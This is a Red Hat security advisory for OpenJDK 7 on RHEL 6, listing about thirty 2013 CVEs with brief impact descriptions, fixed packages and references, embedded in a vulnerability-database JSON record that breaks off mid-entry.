Description:\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit. \n\nMultiple flaws were discovered in the ImagingLib and the image attribute,\nchannel, layout and raster processing in the 2D component. An untrusted\nJava application or applet could possibly use these flaws to trigger Java\nVirtual Machine memory corruption. (CVE-2013-2470, CVE-2013-2471,\nCVE-2013-2472, CVE-2013-2473, CVE-2013-2463, CVE-2013-2465, CVE-2013-2469)\n\nInteger overflow flaws were found in the way AWT processed certain input. \nAn attacker could use these flaws to execute arbitrary code with the\nprivileges of the user running an untrusted Java applet or application. \n(CVE-2013-2459)\n\nMultiple improper permission check issues were discovered in the Sound,\nJDBC, Libraries, JMX, and Serviceability components in OpenJDK. An\nuntrusted Java application or applet could use these flaws to bypass Java\nsandbox restrictions. (CVE-2013-2448, CVE-2013-2454, CVE-2013-2458,\nCVE-2013-2457, CVE-2013-2453, CVE-2013-2460)\n\nMultiple flaws in the Serialization, Networking, Libraries and CORBA\ncomponents can be exploited by an untrusted Java application or applet to\ngain access to potentially sensitive information. (CVE-2013-2456,\nCVE-2013-2447, CVE-2013-2455, CVE-2013-2452, CVE-2013-2443, CVE-2013-2446)\n\nIt was discovered that the Hotspot component did not properly handle\nout-of-memory errors. An untrusted Java application or applet could\npossibly use these flaws to terminate the Java Virtual Machine. \n(CVE-2013-2445)\n\nIt was discovered that the AWT component did not properly manage certain\nresources and that the ObjectStreamClass of the Serialization component\ndid not properly handle circular references. An untrusted Java application\nor applet could possibly use these flaws to cause a denial of service. \n(CVE-2013-2444, CVE-2013-2450)\n\nIt was discovered that the Libraries component contained certain errors\nrelated to XML security and the class loader. A remote attacker could\npossibly exploit these flaws to bypass intended security mechanisms or\ndisclose potentially sensitive information and cause a denial of service. \n(CVE-2013-2407, CVE-2013-2461)\n\nIt was discovered that JConsole did not properly inform the user when\nestablishing an SSL connection failed. An attacker could exploit this flaw\nto gain access to potentially sensitive information. (CVE-2013-2412)\n\nIt was discovered that GnomeFileTypeDetector did not check for read\npermissions when accessing files. An untrusted Java application or applet\ncould possibly use this flaw to disclose potentially sensitive information. \n(CVE-2013-2449)\n\nIt was found that documentation generated by Javadoc was vulnerable to a\nframe injection attack. If such documentation was accessible over a\nnetwork, and a remote attacker could trick a user into visiting a\nspecially-crafted URL, it would lead to arbitrary web content being\ndisplayed next to the documentation. This could be used to perform a\nphishing attack by providing frame content that spoofed a login form on\nthe site hosting the vulnerable documentation. (CVE-2013-1571)\n\nIt was discovered that the 2D component created shared memory segments with\ninsecure permissions. A local attacker could use this flaw to read or write\nto the shared memory segment. (CVE-2013-1500)\n\nRed Hat would like to thank Tim Brown for reporting CVE-2013-1500, and\nUS-CERT for reporting CVE-2013-1571. US-CERT acknowledges Oracle as the\noriginal reporter of CVE-2013-1571. \n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website. \n\nAfter installing this update, users of icedtea-web must install\nRHBA-2013:0959 for icedtea-web to continue functioning. \n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.10. Refer to\nthe NEWS file, linked to in the References, for further information. \n\n4. Solution:\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/knowledge/articles/11258\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n973474 - CVE-2013-1571 OpenJDK: Frame injection in generated HTML (Javadoc, 8012375)\n975099 - CVE-2013-2470 OpenJDK: ImagingLib byte lookup processing (2D, 8011243)\n975102 - CVE-2013-2471 OpenJDK: Incorrect IntegerComponentRaster size checks (2D, 8011248)\n975107 - CVE-2013-2472 OpenJDK: Incorrect ShortBandedRaster size checks (2D, 8011253)\n975110 - CVE-2013-2473 OpenJDK: Incorrect ByteBandedRaster size checks (2D, 8011257)\n975115 - CVE-2013-2463 OpenJDK: Incorrect image attribute verification (2D, 8012438)\n975118 - CVE-2013-2465 OpenJDK: Incorrect image channel verification (2D, 8012597)\n975120 - CVE-2013-2469 OpenJDK: Incorrect image layout verification (2D, 8012601)\n975121 - CVE-2013-2459 OpenJDK: Various AWT integer overflow checks (AWT, 8009071)\n975122 - CVE-2013-2460 OpenJDK: tracing insufficient access checks (Serviceability, 8010209)\n975124 - CVE-2013-2445 OpenJDK: Better handling of memory allocation errors (Hotspot, 7158805)\n975125 - CVE-2013-2448 OpenJDK: Better access restrictions (Sound, 8006328)\n975126 - CVE-2013-2461 OpenJDK: Missing check for valid DOMCanonicalizationMethod canonicalization algorithm (Libraries, 8014281)\n975127 - CVE-2013-2407 OpenJDK: Integrate Apache Santuario, rework class loader (Libraries, 6741606, 8008744)\n975129 - CVE-2013-2454 OpenJDK: SerialJavaObject package restriction (JDBC, 8009554)\n975130 - CVE-2013-2458 OpenJDK: Method handles (Libraries, 8009424)\n975131 - CVE-2013-2444 OpenJDK: Resource denial of service (AWT, 8001038)\n975132 - CVE-2013-2446 OpenJDK: output stream access restrictions (CORBA, 8000642)\n975133 - CVE-2013-2457 OpenJDK: Proper class checking (JMX, 8008120)\n975134 - CVE-2013-2453 OpenJDK: MBeanServer Introspector package access (JMX, 8008124)\n975137 - CVE-2013-2443 OpenJDK: AccessControlContext check order issue (Libraries, 8001330)\n975138 - CVE-2013-2452 OpenJDK: Unique VMIDs(Libraries, 8001033)\n975139 - CVE-2013-2455 OpenJDK: getEnclosing* checks (Libraries, 8007812)\n975140 - CVE-2013-2447 OpenJDK: Prevent revealing the local address (Networking, 8001318)\n975141 - CVE-2013-2450 OpenJDK: ObjectStreamClass circular reference denial of service (Serialization, 8000638)\n975142 - CVE-2013-2456 OpenJDK: ObjectOutputStream access checks (Serialization, 8008132)\n975144 - CVE-2013-2412 OpenJDK: JConsole SSL support (Serviceability, 8003703)\n975145 - CVE-2013-2449 OpenJDK: GnomeFileTypeDetector path access check(Libraries, 8004288)\n975148 - CVE-2013-1500 OpenJDK: Insecure shared memory permissions (2D, 8001034)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.el6_4.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.el6_4.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.el6_4.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.25-2.3.10.3.el6_4.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.25-2.3.10.3.el6_4.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.el6_4.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.el6_4.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.el6_4.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.25-2.3.10.3.el6_4.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.el6_4.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.el6_4.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.el6_4.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.25-2.3.10.3.el6_4.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2013-1500.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1571.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2407.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2412.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2443.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2444.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2445.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2446.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2447.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2448.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2449.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2450.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2452.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2453.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2454.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2455.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2456.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2457.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2458.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2459.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2460.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2461.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2463.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2465.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2469.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2470.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2471.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2472.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2473.html\nhttps://access.redhat.com/security/updates/classification/#critical\nhttp://icedtea.classpath.org/hg/release/icedtea7-2.3/file/icedtea-2.3.10/NEWS\nhttps://rhn.redhat.com/errata/RHBA-2013-0959.html\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2013 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFRwkhZXlSAg2UNWIIRAq8SAJ9tsW9PY39Aa6lmSLhOhlUi8hrnugCePCKO\nNAdLLpJKlVulPXKONu/CudU=\n=+H1U\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n", "sources": [ { "db": "NVD", "id": "CVE-2013-2457" }, { "db": "JVNDB", "id": "JVNDB-2013-003054" }, { "db": "BID", "id": "60632" }, { "db": "VULMON", "id": "CVE-2013-2457" }, { "db": "PACKETSTORM", "id": "122422" }, { "db": "PACKETSTORM", "id": "122423" }, { "db": "PACKETSTORM", "id": "122085" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "122273" }, { "db": "PACKETSTORM", "id": "122189" }, { "db": "PACKETSTORM", "id": "122653" }, { "db": "PACKETSTORM", "id": "122084" }, { "db": "PACKETSTORM", "id": "122651" } ], "trust": 2.88 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-2457", "trust": 3.2 }, { "db": "USCERT", "id": "TA13-169A", "trust": 1.9 }, { "db": "BID", "id": "60632", "trust": 1.4 }, { "db": "SECUNIA", "id": "54154", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2013-003054", "trust": 0.8 }, { "db": "HITACHI", "id": "HS13-015", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-17-213-02", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2013-2457", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122422", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122423", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122085", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126195", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123735", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122273", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122189", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122653", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122084", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122651", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-2457" }, { "db": "BID", "id": "60632" }, { "db": "JVNDB", "id": "JVNDB-2013-003054" }, { "db": "PACKETSTORM", "id": "122422" }, { "db": "PACKETSTORM", "id": "122423" }, { "db": "PACKETSTORM", "id": "122085" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "122273" }, { "db": "PACKETSTORM", "id": "122189" }, { "db": "PACKETSTORM", "id": "122653" }, { "db": "PACKETSTORM", "id": "122084" }, { "db": "PACKETSTORM", "id": "122651" }, { "db": "NVD", "id": "CVE-2013-2457" } ] }, "id": "VAR-201306-0264", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 1.0 }, "last_update_date": "2024-07-04T20:22:30.682000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2013-06-18-1", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2013/jun/msg00002.html" }, { "title": "HT5797", "trust": 0.8, "url": "http://support.apple.com/kb/ht5797" }, { "title": "HT5797", "trust": 0.8, "url": "http://support.apple.com/kb/ht5797?viewlocale=ja_jp" }, { "title": "HS13-015", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs13-015/index.html" }, { "title": "HPSBUX02922 SSRT101305", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03898880" }, { "title": "HPSBUX02907 SSRT101241", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03868911" }, { "title": "HPSBUX02908 SSRT101286", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03874547" }, { "title": "1642336", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21642336" }, { "title": "SUSE-SU-2013:1257", "trust": 0.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00028.html" }, { "title": "SUSE-SU-2013:1293", "trust": 0.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00000.html" }, { "title": "SUSE-SU-2013:1305", "trust": 0.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00003.html" }, { "title": "SUSE-SU-2013:1255", "trust": 0.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00026.html" }, { "title": "SUSE-SU-2013:1256", "trust": 0.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00027.html" }, { "title": "jdk7u/jdk7u-dev/jdk / changeset", "trust": 0.8, "url": "http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/ffef9e05564e" }, { "title": "Oracle Java SE Critical Patch Update Advisory - June 2013", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html" }, { "title": "Text Form of Oracle Java SE Critical Patch Update - June 2013 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/javacpujun2013verbose-1899853.html" }, { "title": "Bug 975133", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=975133" }, { "title": "RHSA-2013:1060", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1060.html" }, { "title": "RHSA-2013:1081", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1081.html" }, { "title": "RHSA-2013:0958", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2013-0958.html" }, { "title": "RHSA-2013:1455", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1455.html" }, { "title": "RHSA-2013:0957", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2013-0957.html" }, { "title": "RHSA-2013:1456", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1456.html" }, { "title": "RHSA-2013:1014", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2013-1014.html" }, { "title": "RHSA-2013:0963", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-0963.html" }, { "title": "RHSA-2013:1059", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2013-1059.html" }, { "title": "June 2013 Critical Patch Update for Java SE Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/june_2013_critical_patch_update" }, { "title": "HS13-015", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs13-015/index.html" }, { "title": "TA13-169A", "trust": 0.8, "url": "http://software.fujitsu.com/jp/security/vulnerabilities/ta13-169a.html" }, { "title": "Oracle Corporation Java\u30d7\u30e9\u30b0\u30a4\u30f3\u306e\u8106\u5f31\u6027\u306b\u95a2\u3059\u308b\u304a\u77e5\u3089\u305b", "trust": 0.8, "url": "http://azby.fmworld.net/support/security/information/oj20130620.html" }, { "title": "Ubuntu Security Notice: openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1907-1" }, { "title": "Debian Security Advisories: DSA-2727-1 openjdk-6 -- several vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=e7d6ea8eb77ee8911e5bbc08ff43f55c" }, { "title": "Ubuntu Security Notice: icedtea-web update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1907-2" }, { "title": "Ubuntu Security Notice: openjdk-6 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1908-1" }, { "title": "Debian Security Advisories: DSA-2722-1 openjdk-7 -- several vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=29128f887c1069c9cc8e265bacca4512" }, { "title": "Amazon Linux AMI: ALAS-2013-207", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-207" }, { "title": "Red Hat: Low: Red Hat Network Satellite server IBM Java Runtime security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131456 - security advisory" }, { "title": "Amazon Linux AMI: ALAS-2013-204", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-204" }, { "title": "Red Hat: Low: Red Hat Network Satellite server IBM Java Runtime security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131455 - security advisory" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-2457" }, { "db": "JVNDB", "id": "JVNDB-2013-003054" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2013-2457" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.0, "url": "http://advisories.mageia.org/mgasa-2013-0185.html" }, { "trust": 1.9, "url": "http://www.us-cert.gov/ncas/alerts/ta13-169a" }, { "trust": 1.6, "url": "http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21642336" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2013-1456.html" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/60632" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=975133" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2013-0963.html" }, { "trust": 1.1, "url": "http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/ffef9e05564e" }, { "trust": 1.1, "url": "http://secunia.com/advisories/54154" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00000.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00003.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00027.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00026.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2013-1081.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2013-1060.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00028.html" }, { "trust": 1.1, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03898880" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2013-1455.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=137545592101387\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=137545505800971\u0026w=2" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2013:183" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2013-1059.html" }, { "trust": 1.1, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.1, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19696" }, { "trust": 1.1, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19638" }, { "trust": 1.1, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19276" }, { "trust": 1.1, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a17256" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00029.html" }, { "trust": 1.1, "url": "https://access.redhat.com/errata/rhsa-2014:0414" }, { "trust": 1.0, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2457" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2453" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2456" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2445" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2455" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2457" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2407" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2447" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2452" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2459" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1571" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2412" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2461" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2463" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2448" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2465" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2446" }, { "trust": 0.9, "url": 